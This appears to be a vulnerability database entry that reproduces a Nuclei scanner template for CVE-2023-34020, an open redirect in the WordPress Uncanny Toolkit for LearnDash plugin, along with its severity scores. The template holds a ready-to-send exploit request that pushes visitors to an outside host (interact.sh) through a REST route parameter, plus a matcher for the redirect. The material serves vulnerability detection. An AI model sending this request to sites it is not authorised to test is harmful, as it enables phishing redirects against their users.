Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-34020
HistoryNov 06, 2023 - 9:21 a.m.

Uncanny Toolkit for LearnDash - Open Redirection

2023-11-0609:21:19
ProjectDiscovery
github.com
8
cve2023
wordpress
uncanny toolkit for learndash
wpscan
open redirection
phishing

CVSS3

4.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

AI Score

4.8

Confidence

High

EPSS

0.001

Percentile

32.6%

A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.
id: CVE-2023-34020

info:
  name: Uncanny Toolkit for LearnDash - Open Redirection
  author: LeDoubleTake
  severity: medium
  description: |
    A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.
  reference:
    - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability
    - https://wordpress.org/plugins/uncanny-learndash-toolkit/
    - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
    cvss-score: 4.7
    cve-id: CVE-2023-34020
    cwe-id: CWE-601
    epss-score: 0.00076
    epss-percentile: 0.32361
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/uncanny-learndash-toolkit/"
  tags: cve2023,cve,wordpress,uncanny-learndash-toolkit,wpscan,redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 4a0a0047304502201c291b8c777b1f2832181c0b177acec46e3a1864d8cda77bb5d56b7aabd0cf5d022100bb38f50f255d8d3fcea6bbe1d7bc2367500fee3c65ea13c990bc0c970a2f4934:922c64590222798bb761d5b6d8e72950

CVSS3

4.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

AI Score

4.8

Confidence

High

EPSS

0.001

Percentile

32.6%

Related for NUCLEI:CVE-2023-34020